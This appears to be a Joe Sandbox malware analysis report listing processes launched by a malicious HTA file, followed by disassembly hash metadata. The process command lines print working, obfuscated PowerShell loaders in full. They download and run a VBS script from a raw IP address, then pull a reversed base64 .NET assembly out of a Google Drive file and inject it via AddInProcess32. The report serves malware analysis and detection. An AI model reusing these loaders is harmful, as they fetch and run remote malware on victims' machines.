                                      Start date:25/10/2024
                                      Path:C:\Windows\SysWOW64\mshta.exe
                                      Wow64 process (32bit):true
                                      Commandline:mshta.exe "C:\Users\user\Desktop\seethebestthingstobegoodwithhislifebestthigns.hta"
                                      Imagebase:0x590000
                                      File size:13'312 bytes
                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:04:33:12
                                      Start date:25/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
                                      Imagebase:0x710000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:04:33:12
                                      Start date:25/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:04:33:13
                                      Start date:25/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
                                      Imagebase:0x710000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:04:33:17
                                      Start date:25/10/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline"
                                      Imagebase:0x150000
                                      File size:2'141'552 bytes
                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:04:33:17
                                      Start date:25/10/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES35E6.tmp" "c:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP"
                                      Imagebase:0x4b0000
                                      File size:46'832 bytes
                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:04:33:22
                                      Start date:25/10/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
                                      Imagebase:0xec0000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:04:33:22
                                      Start date:25/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                      Imagebase:0x710000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:04:33:22
                                      Start date:25/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:04:33:23
                                      Start date:25/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
                                      Imagebase:0x710000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 06950FD7 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000003.1835943278.0000000006950000.00000010.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_3_6950000_mshta.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                        • Instruction ID: 15c22385d54f5a2a052ad44d6c168aab8c1273385c3745c4db729e23c5ebba20
                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                        • Instruction Fuzzy Hash:
                                        Function 06950FDF Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000003.1835943278.0000000006950000.00000010.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_3_6950000_mshta.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                        • Instruction ID: 15c22385d54f5a2a052ad44d6c168aab8c1273385c3745c4db729e23c5ebba20
                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                        • Instruction Fuzzy Hash:
                                        Function 06950FE7 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000003.1835943278.0000000006950000.00000010.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_3_6950000_mshta.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                        • Instruction ID: 15c22385d54f5a2a052ad44d6c168aab8c1273385c3745c4db729e23c5ebba20
                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                        • Instruction Fuzzy Hash:

                                        Executed Functions

                                        Function 048A4BB0 Relevance: 2.0, APIs: 1, Instructions: 489COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1984226808.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_48a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ce09095d196ee2610310c1a25229d39d203ac494a29b27299a906d279f94528
                                        • Instruction ID: 594fe97d27db05721a477a079aa4589ac72938cdecca8662e36eb5bd132d3871
                                        • Opcode Fuzzy Hash: 2ce09095d196ee2610310c1a25229d39d203ac494a29b27299a906d279f94528
                                        • Instruction Fuzzy Hash: 7C223A75A00219EFDB05CF98C984A9EBBB2FF48310F248659E814EB365C775ED91CB90
                                        Function 07741178 Relevance: 3.0, Strings: 2, Instructions: 452COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2013629461.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7740000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tP^q$tP^q
                                        • API String ID: 0-309238000
                                        • Opcode ID: f7814def64dfe765431a98d1ef2f974a94d0076370cdab1120cdba61065eadd6
                                        • Instruction ID: 7f516d312d18239fa641d85f364a723c13b6736dc1ce95cb5330b441ed37c5dc
                                        • Opcode Fuzzy Hash: f7814def64dfe765431a98d1ef2f974a94d0076370cdab1120cdba61065eadd6
                                        • Instruction Fuzzy Hash: B9F1E4B0B00209AFCB14AF58D804A6ABBF6BFC5750F658869E9099F350DF72DC85C791
                                        Function 077404F8 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2013629461.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7740000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tP^q$tP^q
                                        • API String ID: 0-309238000
                                        • Opcode ID: 3c79f9f40d4896f9bce3a9282ae0c5ca607d02116d52911e307a9b39d37d2a31
                                        • Instruction ID: 49132238175298615faac78a353927229892c8fe992fe3a11415e8464bd44eeb
                                        • Opcode Fuzzy Hash: 3c79f9f40d4896f9bce3a9282ae0c5ca607d02116d52911e307a9b39d37d2a31
                                        • Instruction Fuzzy Hash: 0B5145B1B00214AFC7105B68C804B2ABBE6EBC5754F14C89AEA49DF381CB71DC45C3A1
                                        Function 048A1A30 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 048A51C9
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1984226808.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_48a0000_powershell.jbxd
                                        Similarity
                                        • API ID: DownloadFile
                                        • String ID:
                                        • API String ID: 1407266417-0
                                        • Opcode ID: 08cc6499c8f9c6d67734a4c601ee36bffb4cd6705079645d9c3682380cf343f7
                                        • Instruction ID: 6a24726e1a0dfcbb7cb87fee0322207d4377f1fee8e036c991282f356493b6c9
                                        • Opcode Fuzzy Hash: 08cc6499c8f9c6d67734a4c601ee36bffb4cd6705079645d9c3682380cf343f7
                                        • Instruction Fuzzy Hash: B621E6B5D01619EFDB00CF99D984BEEFBB4FB48314F108529E918A7210D375A954CBA4
                                        Function 07741113 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2013629461.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7740000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tP^q
                                        • API String ID: 0-2862610199
                                        • Opcode ID: e85503fef5ccf0a068ccacaebf6119e74e02db329e18ec124d89935ba46d3c1f
                                        • Instruction ID: 1dde2790d60b54cc03686e71717d9723084dcf3d735732380094a78e3138fafc
                                        • Opcode Fuzzy Hash: e85503fef5ccf0a068ccacaebf6119e74e02db329e18ec124d89935ba46d3c1f
                                        • Instruction Fuzzy Hash: 3E91C3B0B00309DFCB18AF58C544A69BBF2BB85750F698899E9199F390DB31DCC5CB91
                                        Function 0774115B Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2013629461.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7740000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tP^q
                                        • API String ID: 0-2862610199
                                        • Opcode ID: c25dcb05dd0ffda228a25777a9a9c77ab022178b4b11f33aa08df69961a82586
                                        • Instruction ID: b53c656201c06be7be54c428beda8a6d8a82274dc3ad281eb6f6b8af96b22810
                                        • Opcode Fuzzy Hash: c25dcb05dd0ffda228a25777a9a9c77ab022178b4b11f33aa08df69961a82586
                                        • Instruction Fuzzy Hash: A591C1B0B00209EFCB18EF58C544B69BBF2BF84750F598869E9199B354DB31EC81CB91
                                        Function 0474D01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1983479905.000000000474D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0474D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_474d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb34c9f1c29175852034af0b0e34b286215680889a4b3b988c92c81f93e735f0
                                        • Instruction ID: f95495d75112f0501db810806c048da91278fd5cae8c2b75fc204320dd5c5195
                                        • Opcode Fuzzy Hash: cb34c9f1c29175852034af0b0e34b286215680889a4b3b988c92c81f93e735f0
                                        • Instruction Fuzzy Hash: 1C012B311083009AE7304E26ED84B77FF98EF81324F08C92AED880B356D779E841C6B1
                                        Function 0474D005 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1983479905.000000000474D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0474D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_474d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2cd6d45f28a6838c1a8915b17eda112ea76bda431df814e43ad4e0fbb93d522e
                                        • Instruction ID: 5465cc759f20ea90b23bf018926428b77b067a423b9e2457dd0253237a90d5e0
                                        • Opcode Fuzzy Hash: 2cd6d45f28a6838c1a8915b17eda112ea76bda431df814e43ad4e0fbb93d522e
                                        • Instruction Fuzzy Hash: CB01526100E3C05FD7128B259C94B62BFB4EF53224F1DC5DBD9888F2A3C2699844C772

                                        Non-executed Functions

                                        Function 07740B70 Relevance: 6.4, Strings: 5, Instructions: 170COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2013629461.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7740000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$X=al$$^q$$^q
                                        • API String ID: 0-2971498526
                                        • Opcode ID: 1e3a8842bd34c18f4363df2a4d6ba3bed8526205a94d0f75c91587ba567b1f40
                                        • Instruction ID: abce0e37dd05cc73aebc93bea8362794aeeee47583fcb58907a8caa7d53bf061
                                        • Opcode Fuzzy Hash: 1e3a8842bd34c18f4363df2a4d6ba3bed8526205a94d0f75c91587ba567b1f40
                                        • Instruction Fuzzy Hash: 4E5107B1B44309CFCB258B78D8147AABBF2AFC2250F1488EBD645CB255DB35D885C791
                                        Function 0774007F Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2013629461.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7740000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: cd7403c11b13d8f2f528a7651fd7f9a9643f9efd5e2070f0c35d6e4cbd7d39a8
                                        • Instruction ID: 9e472eca46aa9d94b77eaca42dd6e049d8195365355b13fc8c7a87a14d972538
                                        • Opcode Fuzzy Hash: cd7403c11b13d8f2f528a7651fd7f9a9643f9efd5e2070f0c35d6e4cbd7d39a8
                                        • Instruction Fuzzy Hash: 1A01F97164C3894FC72B02291C24169AFB55FC355072945D7C580DF2B7CE658D49C3E3

                                        Executed Functions

                                        Function 07911C10 Relevance: 5.6, Strings: 4, Instructions: 582COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1868435481.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                        • API String ID: 0-1420252700
                                        • Opcode ID: 6faf651d76bd1c277c83c75462f07334320c11a5e169f01e49be2ba6db338271
                                        • Instruction ID: 4600d5d82813b3fb93daaf0c082fd746f87ff8f36724991fbb7bbe31561e4d15
                                        • Opcode Fuzzy Hash: 6faf651d76bd1c277c83c75462f07334320c11a5e169f01e49be2ba6db338271
                                        • Instruction Fuzzy Hash: 101278B1B4031D9FCB159B68880076A7BEAAFD2318F1484BBD605CF395DB31C9A5C7A1
                                        Function 07911BF2 Relevance: .1, Instructions: 118COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1868435481.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06290365ac29675081f475479396b0eb94171b12176dddfcf884e7e15c74a73a
                                        • Instruction ID: 7e6bbc7c0c2511a28b6e4fe60641ee7d70d86fbc7451caaea69304021869a071
                                        • Opcode Fuzzy Hash: 06290365ac29675081f475479396b0eb94171b12176dddfcf884e7e15c74a73a
                                        • Instruction Fuzzy Hash: 734104F4B4031EAFCF15CF188541B6A7BFAAF82208F4480A9C6049F295D735C9A1CBA1

                                        Non-executed Functions

                                        Function 07911270 Relevance: 9.2, Strings: 7, Instructions: 491COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1868435481.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                        • API String ID: 0-1608119003
                                        • Opcode ID: 9d3895df3876ccdbd84cfb480e1f3cfaec3729261742d135a6e7dbf32056d1b7
                                        • Instruction ID: df9318e4f861f12e4bb42e690d186c7b810932583624f54c713ff11b43072445
                                        • Opcode Fuzzy Hash: 9d3895df3876ccdbd84cfb480e1f3cfaec3729261742d135a6e7dbf32056d1b7
                                        • Instruction Fuzzy Hash: 5DF178B1B4431DAFCB148B6C940066ABBEAAFD1714F1884BAD605CF355DB32CC95C791
                                        Function 079104E0 Relevance: 9.1, Strings: 7, Instructions: 320COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1868435481.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                        • API String ID: 0-1608119003
                                        • Opcode ID: f6a3982ef8325aa0da66fbb4ee6eded78e51b45c0ed64877a0e58b9232c098a0
